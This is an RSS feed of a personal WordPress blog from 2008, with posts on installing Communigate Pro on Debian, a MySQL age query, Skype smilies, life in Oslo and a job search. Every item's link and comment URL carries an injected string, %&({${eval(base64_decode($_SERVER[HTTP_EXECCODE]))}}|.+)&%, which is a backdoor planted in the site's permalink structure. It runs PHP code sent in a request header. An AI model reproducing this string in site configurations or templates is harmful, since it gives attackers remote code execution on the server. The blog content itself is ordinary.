<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>Anton Babenko's blog</title>
	<atom:link href="http://antonbabenko.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://antonbabenko.com</link>
	<description>I write about what I want</description>
	<pubDate>Sun, 27 Sep 2009 04:04:13 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6.2</generator>
	<language>en</language>
			<item>
		<title>How to install Communigate Pro on Debian etch</title>
		<link>http://antonbabenko.com/2008/12/03/how-to-install-communigate-pro-on-debian-etch/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://antonbabenko.com/2008/12/03/how-to-install-communigate-pro-on-debian-etch/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Wed, 03 Dec 2008 11:39:00 +0000</pubDate>
		<dc:creator>Bob</dc:creator>
		
		<category><![CDATA[Work]]></category>

		<category><![CDATA[debian communigate]]></category>

		<guid isPermaLink="false">http://antonbabenko.com/?p=98</guid>
		<description><![CDATA[I didn&#8217;t find the way of installing Communigate Pro in the official documentation and even Google search didn&#8217;t help, so I used to do a small fix and write this small note which might help some newbie-debian-admins like me.
The problem was that I had this result when do installation like in the official documentation:

Installing the [...]]]></description>
			<content:encoded><![CDATA[<p>I didn&#8217;t find the way of installing Communigate Pro in the <a href="http://www.communigate.com/WebGuide/Install.html#Linux">official documentation</a> and even <a href="http://www.google.no/search?q=how+to+install+CommuniGate+on+debian+etch">Google search</a> didn&#8217;t help, so I used to do a small fix and write this small note which might help some newbie-debian-admins like me.</p>
<p>The problem was that I had this result when do installation like in the official documentation:<br />
<code><br />
Installing the start-up launcher...<br />
install.sh: line 115: /etc/rc.d/init.d/CommuniGate: No such file or directory<br />
chmod: cannot access `/etc/rc.d/init.d/CommuniGate': No such file or directory<br />
creating a link for the new /bin/mail program<br />
creating startup script links<br />
install.sh: line 204: cd: /etc/rc.d/rc0.d: No such file or directory<br />
install.sh: line 205: cd: /etc/rc.d/rc1.d: No such file or directory<br />
ln: creating symbolic link `K10CommuniGate' to `/etc/rc.d/init.d/CommuniGate': File exists<br />
install.sh: line 206: cd: /etc/rc.d/rc2.d: No such file or directory<br />
ln: creating symbolic link `K10CommuniGate' to `/etc/rc.d/init.d/CommuniGate': File exists<br />
install.sh: line 207: cd: /etc/rc.d/rc3.d: No such file or directory<br />
install.sh: line 208: cd: /etc/rc.d/rc5.d: No such file or directory<br />
ln: creating symbolic link `S80CommuniGate' to `/etc/rc.d/init.d/CommuniGate': File exists<br />
install.sh: line 209: cd: /etc/rc.d/rc6.d: No such file or directory<br />
ln: creating symbolic link `K10CommuniGate' to `/etc/rc.d/init.d/CommuniGate': File exists<br />
</code></p>
<p>As a result it said that &#8220;The CommuniGate Pro server has been installed.&#8221;, but in fact it was not so, and in order to make things work I did the modification in install.sh and have changed two variables to point them to the right location:<br />
<code><br />
RCDIR="/etc"<br />
STARTSCRIPTS="/etc/init.d"<br />
</code><br />
and then run <em>sh install.sh</em> and it works.</p>
]]></content:encoded>
			<wfw:commentRss>http://antonbabenko.com/2008/12/03/how-to-install-communigate-pro-on-debian-etch/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>User age in MySQL</title>
		<link>http://antonbabenko.com/2008/09/04/user_age_mysql/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://antonbabenko.com/2008/09/04/user_age_mysql/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Thu, 04 Sep 2008 14:58:08 +0000</pubDate>
		<dc:creator>Bob</dc:creator>
		
		<category><![CDATA[Work]]></category>

		<category><![CDATA[birthday]]></category>

		<category><![CDATA[mysql]]></category>

		<guid isPermaLink="false">http://antonbabenko.com/?p=94</guid>
		<description><![CDATA[Finally I have decided how to get the real age of users using mysql:

SELECT YEAR(NOW()) - YEAR(birthday) - IF ( MONTH(NOW()) &#60; MONTH(birthday), 1, 0 ) - IF ( MONTH(NOW()) = MONTH(birthday) AND DAYOFMONTH(NOW()) &#60; DAYOFMONTH(birthday), 1, 0) AS age, birthday, now() from profile where id = 37;

Any comments? :)
]]></description>
			<content:encoded><![CDATA[<p>Finally I have decided how to get the real age of users using mysql:</p>
<p><code><br />
SELECT YEAR(NOW()) - YEAR(birthday) - IF ( MONTH(NOW()) &lt; MONTH(birthday), 1, 0 ) - IF ( MONTH(NOW()) = MONTH(birthday) AND DAYOFMONTH(NOW()) &lt; DAYOFMONTH(birthday), 1, 0) AS age, birthday, now() from profile where id = 37;<br />
</code></p>
<p>Any comments? :)</p>
]]></content:encoded>
			<wfw:commentRss>http://antonbabenko.com/2008/09/04/user_age_mysql/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Skype hidden smilies</title>
		<link>http://antonbabenko.com/2008/06/17/skype-hidden-smilies/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://antonbabenko.com/2008/06/17/skype-hidden-smilies/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Tue, 17 Jun 2008 09:37:47 +0000</pubDate>
		<dc:creator>Bob</dc:creator>
		
		<category><![CDATA[Fun]]></category>

		<category><![CDATA[Links]]></category>

		<category><![CDATA[emotions]]></category>

		<category><![CDATA[skype]]></category>

		<guid isPermaLink="false">http://antonbabenko.com/?p=65</guid>
		<description><![CDATA[I love Skype for all, but today Øyvind showed me a link to hidden Skype emotions.
For those who have Skype up and running now, try to use these in chat window:
(mooning) -> a man dropping his pants
(toivo) -> a man and his dog
(finger) -> flipping the bird
(kate) -> putting on lipstick
(bandit) -> a ninja looking [...]]]></description>
			<content:encoded><![CDATA[<p>I love <a href="http://www.skype.com/" target="_blank">Skype</a> for all, but today Øyvind showed me <a href="http://www.eddieoneverything.com/software/hidden-skype-icons-and-emoticons.php" target="_blank">a link to hidden Skype emotions</a>.</p>
<p>For those who have Skype up and running now, try to use these in chat window:<br />
(mooning) -> a man dropping his pants<br />
(toivo) -> a man and his dog<br />
(finger) -> flipping the bird<br />
(kate) -> putting on lipstick<br />
(bandit) -> a ninja looking emoticon<br />
(headbang) or (banghead) -> smiley banging his head into a wall<br />
(drunk) -> a drunk smiley<br />
(rock) -> smiley making the rocker hand sign<br />
(smoke) or (smoking) or (ci) -> smoking smiley</p>
]]></content:encoded>
			<wfw:commentRss>http://antonbabenko.com/2008/06/17/skype-hidden-smilies/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Sukkerfest - party for singles in Oslo</title>
		<link>http://antonbabenko.com/2008/06/15/sukkerfest/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://antonbabenko.com/2008/06/15/sukkerfest/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Sun, 15 Jun 2008 14:49:05 +0000</pubDate>
		<dc:creator>Bob</dc:creator>
		
		<category><![CDATA[Life]]></category>

		<category><![CDATA[Work]]></category>

		<category><![CDATA[norway]]></category>

		<category><![CDATA[sukker]]></category>

		<category><![CDATA[sukkerfest]]></category>

		<guid isPermaLink="false">http://antonbabenko.com/?p=64</guid>
		<description><![CDATA[It was very nice to be in Kokkamokk cafe&#038;bar yesterday evening and take part in Sukkerfest orginized by Sukker.no for its members. For me it was the first party of such kind here in Norway.
Nice environment, friendly crowd of people (as I know, there were about 500 people yesterday).
Guests started comming at 18:00 and each [...]]]></description>
			<content:encoded><![CDATA[<p>It was very nice to be in Kokkamokk cafe&#038;bar yesterday evening and take part in Sukkerfest orginized by <a href="http://www.sukker.no/" target="_blank">Sukker.no</a> for its members. For me it was the first party of such kind here in Norway.</p>
<p>Nice environment, friendly crowd of people (as I know, there were about 500 people yesterday).</p>
<p>Guests started comming at 18:00 and each registered site members could be photographed there, so he/she would get the card with Top-18 matches later in the evening. Almost all evening I was sitting there and making pictures of people. Det var fint og veldig interessant. Then was salsa course, drinks and chips, talks and dances, and&#8230; you know :)</p>
<p>I have to note that the biggest problem for me was my missing norwegian språk. It was rather silly to forward all questions from people who asked me in norwegian to Mortens, because people couldn&#8217;t understand why I didn&#8217;t speak norwegian, but only english. Damn. Jeg vil lære norsk. :)</p>
<p>Finally I went home at 1 in the night, but the show was not ended yet&#8230;</p>
<p>After this party I have even more inspiration and desire to work on <a href="http://www.sukker.no/" target="_blank">sukker.no</a> web-site and do all my best to keep its visitors excited.</p>
]]></content:encoded>
			<wfw:commentRss>http://antonbabenko.com/2008/06/15/sukkerfest/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Daewoo Espero 2.0 CD for sale in Oslo</title>
		<link>http://antonbabenko.com/2008/06/11/daewoo-espero-20-cd-for-sale-in-oslo/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://antonbabenko.com/2008/06/11/daewoo-espero-20-cd-for-sale-in-oslo/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Wed, 11 Jun 2008 13:05:22 +0000</pubDate>
		<dc:creator>Bob</dc:creator>
		
		<category><![CDATA[Life]]></category>

		<guid isPermaLink="false">http://antonbabenko.com/?p=63</guid>
		<description><![CDATA[I am selling my super car. Read more information about my car on zett.no.
]]></description>
			<content:encoded><![CDATA[<p>I am selling my super car. Read more information about my car on <a href="http://www.zett.no/bil__til_salgs.html?objectId=1302796" target="_blank" title="Daewoo Espero 2.0 in Oslo">zett.no</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://antonbabenko.com/2008/06/11/daewoo-espero-20-cd-for-sale-in-oslo/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Working on Sukker.no</title>
		<link>http://antonbabenko.com/2008/06/06/working-on-sukkerno/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://antonbabenko.com/2008/06/06/working-on-sukkerno/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Fri, 06 Jun 2008 12:36:56 +0000</pubDate>
		<dc:creator>Bob</dc:creator>
		
		<category><![CDATA[Work]]></category>

		<category><![CDATA[sukker]]></category>

		<guid isPermaLink="false">http://antonbabenko.com/?p=62</guid>
		<description><![CDATA[We have moved from Stavanger to Oslo last week and now I am starting to write a new series of my work related notes. I have permanent work contract in Warm Systems company and my project is sukker.no. Sukker.no - is a dating web-service which is rather popular in Norway. My work on this project [...]]]></description>
			<content:encoded><![CDATA[<p>We have moved from Stavanger to Oslo last week and now I am starting to write a new series of my work related notes. I have permanent work contract in Warm Systems company and my project is <a href="http://www.sukker.no/" title="Dating in Norway">sukker.no</a>. Sukker.no - is a dating web-service which is rather popular in Norway. My work on this project includes (but not limited) web-development and consulting in all fields of web-site development where I feel confident (web-analitycs and marketing plan, social media promotion, new technologies, success-meters and product development).</p>
<p>Web-site which is working there now should have new features and be totally replaned to be able to expand and grow further. Meanwhile I am learning more about the dating market and doing small fixes for the site which is required to be done before we go further. Hopefully in a week I will finish them.</p>
<p>PS: I won&#8217;t write any sensitive information related with my work, but just write some facts and notes (hopefully somebody find them interesting). Feel free to ask me if smth comes. :)</p>
<p>Such a beautiful weather is here in Oslo! :)</p>
]]></content:encoded>
			<wfw:commentRss>http://antonbabenko.com/2008/06/06/working-on-sukkerno/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Sharksurfing</title>
		<link>http://antonbabenko.com/2008/05/13/sharksurfing/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://antonbabenko.com/2008/05/13/sharksurfing/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Tue, 13 May 2008 07:29:55 +0000</pubDate>
		<dc:creator>Bob</dc:creator>
		
		<category><![CDATA[Video]]></category>

		<category><![CDATA[Windsurfing]]></category>

		<category><![CDATA[shark]]></category>

		<category><![CDATA[surfing]]></category>

		<guid isPermaLink="false">http://antonbabenko.com/?p=59</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<p><object width="464" height="392"><param name="movie" value="http://embed.break.com/NDk2MTIz"></param><embed src="http://embed.break.com/NDk2MTIz" type="application/x-shockwave-flash" width="464" height="392"></embed></object></p>
]]></content:encoded>
			<wfw:commentRss>http://antonbabenko.com/2008/05/13/sharksurfing/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Recent blog updates</title>
		<link>http://antonbabenko.com/2008/04/30/recent-blog-updates/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://antonbabenko.com/2008/04/30/recent-blog-updates/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Wed, 30 Apr 2008 11:48:38 +0000</pubDate>
		<dc:creator>Bob</dc:creator>
		
		<category><![CDATA[This blog]]></category>

		<category><![CDATA[blog]]></category>

		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://antonbabenko.com/?p=55</guid>
		<description><![CDATA[Recently I have updated wordpress engine to 2.5.1 and noted that it is had a sad bug related to Gengo (multilanguage wordpress plugin) and widgets tab in the admin, so I can&#8217;t manage widgets unless developers release a bugfix.
Nevertheless the blog got significant raise of Alexa rating (the site&#8217;s place is 410119, so far). Google&#8217;s [...]]]></description>
			<content:encoded><![CDATA[<p>Recently I have updated wordpress engine to 2.5.1 and noted that it is had a sad bug related to Gengo (multilanguage wordpress plugin) and widgets tab in the admin, so I can&#8217;t manage widgets unless developers release a bugfix.</p>
<p>Nevertheless the blog got significant raise of Alexa rating (the site&#8217;s place is 410119, so far). Google&#8217;s Pagerank has been recounted and homepage has gotten PR 3 today.</p>
<p>Looks like a very good result for 3 monthes old blog which has not been promoted on the web. :)</p>
<p>What I did to get such nice positions did not eat a lot of time at all. I write very seldom (unfortunately to me), but I made a really nice urls for each page (no dynamic urls at all), so search engines index the site rather deep.</p>
]]></content:encoded>
			<wfw:commentRss>http://antonbabenko.com/2008/04/30/recent-blog-updates/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Looking for a full-time job in Norway as a Technical Product Manager</title>
		<link>http://antonbabenko.com/2008/03/11/looking-for-a-full-time-job-in-norway-as-a-technical-product-manager/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://antonbabenko.com/2008/03/11/looking-for-a-full-time-job-in-norway-as-a-technical-product-manager/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Tue, 11 Mar 2008 10:00:53 +0000</pubDate>
		<dc:creator>Bob</dc:creator>
		
		<category><![CDATA[Life]]></category>

		<category><![CDATA[Work]]></category>

		<category><![CDATA[norway]]></category>

		<guid isPermaLink="false">http://antonbabenko.com/2008/03/looking-for-a-full-time-job-in-norway-as-a-technical-product-manager</guid>
		<description><![CDATA[Hi!
I am now looking for a full-time job as a technical product manager. I have rather large experience in a wide variety of internet applications management and development. Particularly I am interested in a project and/or product management of web 2.0 projects where my technical skills and innovative thoughts will add value.
If you are interested [...]]]></description>
			<content:encoded><![CDATA[<p>Hi!</p>
<p>I am now looking for a full-time job as a technical product manager. I have rather large experience in a wide variety of internet applications management and development. Particularly I am interested in a project and/or product management of web 2.0 projects where my technical skills and innovative thoughts will add value.</p>
<p>If you are interested or know who might be interested in my CV and references then contact me by:</p>
<ul>
<li>E-mail: anton [at] <a href="http://antonbabenko.com" title="http://antonbabenko.com" target="_blank">antonbabenko.com</a></li>
<li>Phone: +47 95425659</li>
<li>Skype: antonbabenko</li>
<li>LinkedIn profile: <a href="http://www.linkedin.com/in/antonbabenko">http://www.linkedin.com/in/antonbabenko</a></li>
</ul>
<p>Best wishes to everybody,</p>
<p>Anton Babenko.</p>
]]></content:encoded>
			<wfw:commentRss>http://antonbabenko.com/2008/03/11/looking-for-a-full-time-job-in-norway-as-a-technical-product-manager/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>HTTP/1.1 Status codes</title>
		<link>http://antonbabenko.com/2008/03/11/http11-status-codes/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://antonbabenko.com/2008/03/11/http11-status-codes/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Tue, 11 Mar 2008 09:56:26 +0000</pubDate>
		<dc:creator>Bob</dc:creator>
		
		<category><![CDATA[Links]]></category>

		<category><![CDATA[Work]]></category>

		<category><![CDATA[http]]></category>

		<category><![CDATA[web]]></category>

		<guid isPermaLink="false">http://antonbabenko.com/2008/03/http11-status-codes</guid>
		<description><![CDATA[Nice schema which shows the resolution of HTTP/1.1 (DELETE, GET, HEAD, PUT, POST) status codes.


Author: Alan Dean
]]></description>
			<content:encoded><![CDATA[<p>Nice schema which shows the resolution of HTTP/1.1 (DELETE, GET, HEAD, PUT, POST) status codes.</p>
<p><span id="more-48"></span></p>
<p><a href="http://thoughtpad.net/alan-dean/http-headers-status.gif" title="View full schema"><img src="http://thoughtpad.net/alan-dean/http-headers-status.gif" title="An activity diagram to describe the resolution of the response status code, given various headers" style="border-width: 1px; width: 400px; height: 314px" border="1" height="314" width="400" /></a></p>
<p>Author: <a href="http://thoughtpad.net/alan-dean.html">Alan Dean</a></p>
]]></content:encoded>
			<wfw:commentRss>http://antonbabenko.com/2008/03/11/http11-status-codes/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
